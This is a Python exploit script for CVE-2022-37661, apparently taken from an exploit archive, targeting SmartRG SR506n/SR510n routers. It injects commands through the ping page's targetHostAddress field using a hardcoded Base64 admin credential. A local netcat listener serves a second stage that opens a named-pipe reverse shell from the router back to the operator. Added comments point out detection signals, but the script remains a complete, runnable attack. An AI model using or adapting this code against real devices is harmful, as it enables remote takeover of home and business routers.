## https://sploitus.com/exploit?id=PACKETSTORM:168336
# Exploit Title: SmartRG Router - Remote Code Execution  
# Date: 13/06/2022  
# Exploit Author: Yerodin Richards  
# Vendor Homepage: https://adtran.com  
# Version: 2.5.15 / 2.6.13 (confirmed)  
# Tested on: SR506n (2.5.15) & SR510n (2.6.13)  
# CVE : CVE-2022-37661  
  
import requests  
from subprocess import Popen, PIPE  
  
# Base URL of the router's web administration interface; every request in
# this file is built from it.
router_host = "http://192.168.1.1"
# Value sent after "Basic " in the Authorization header, i.e. a Base64-encoded
# user:password pair for HTTP Basic authentication. Both requests in this file
# carry it, so the flow shown here is an authenticated one.
# NOTE(review): presumably a default or otherwise known admin credential;
# confirm. If so, changing the admin password limits who can reach the
# affected endpoint.
authorization_header = "YWRtaW46QWRtMW5ATDFtMyM="

# Host and port interpolated into the command strings built in main().
# NOTE(review): "lo" looks like a placeholder to be replaced by the operator; confirm.
lhost = "lo"
lport = 80

# Port of the local `nc` listener started in main(); also interpolated into
# the string passed to send_payload().
payload_port = 81
  
  
def main():
    """Run the proof of concept for the issue named in the file header.

    Starts an ``echo`` process whose stdout feeds a local ``nc`` listener on
    ``payload_port``, then calls ``send_payload`` with a string that begins
    with ``|``. Neither child process is waited on or cleaned up.

    Defender note: the strings built here reference the named pipe ``/tmp/s``
    and ``nc`` connections from the device to ``lhost`` on ``payload_port``
    and ``lport``; unexpected outbound connections from a router's management
    plane and that file path are usable indicators.
    """
    second_stage = f"rm /tmp/s & mknod /tmp/s p & /bin/sh 0< /tmp/s | nc {lhost} {lport} > /tmp/s"
    echo_proc = Popen(["echo", second_stage], stdout=PIPE)
    # The listener's stdin is the echo output, so whatever connects to
    # payload_port receives the second-stage string.
    Popen(["nc", "-nlvp", str(payload_port)], stdin=echo_proc.stdout)
    send_payload(f"|nc {lhost} {payload_port}|sh")
    print("done.. check shell")
  
  
def get_session():
    """Fetch /admin/ping.html and return the session key embedded in it.

    The key is taken as the characters that follow the first
    ``&sessionKey=`` in the response body, up to (not including) the next
    single quote. The request carries the Basic Authorization header built
    from ``authorization_header``.

    Note that ``str.find`` returns -1 when the marker is absent, in which
    case the scan starts at an unrelated offset; an ``IndexError`` is raised
    if no single quote follows the starting offset. No timeout is set on the
    request.
    """
    marker = "&sessionKey="
    page = requests.get(
        router_host + "/admin/ping.html",
        headers={"Authorization": "Basic {}".format(authorization_header)},
    ).text
    pos = page.find(marker) + len(marker)
    collected = []
    # Character-by-character scan up to the closing quote.
    while page[pos] != "'":
        collected.append(page[pos])
        pos += 1
    return "".join(collected)
  
  
def send_payload(payload):
    """Send ``payload`` as the ``targetHostAddress`` of a pingHost.cmd request.

    Prints the payload, then issues an authenticated GET to
    ``/admin/pingHost.cmd`` with ``action=add``, the payload as
    ``targetHostAddress`` and a fresh session key from ``get_session()``.
    The response body is read and discarded.

    Defender note: the file header attributes command execution through
    this request to CVE-2022-37661. The value arrives in a field meant for a
    ping target, so requests to this endpoint whose ``targetHostAddress``
    contains shell metacharacters such as ``|`` are a detection signal, and
    the device-side remedy is to accept only a hostname or IP address there.
    """
    print(payload)
    endpoint = router_host + "/admin/pingHost.cmd"
    auth = {"Authorization": "Basic {}".format(authorization_header)}
    query = {
        "action": "add",
        "targetHostAddress": payload,
        "sessionKey": get_session(),
    }
    requests.get(endpoint, headers=auth, params=query).text
  
  
# No `if __name__ == "__main__":` guard: main() runs whenever this file is
# executed or imported.
main()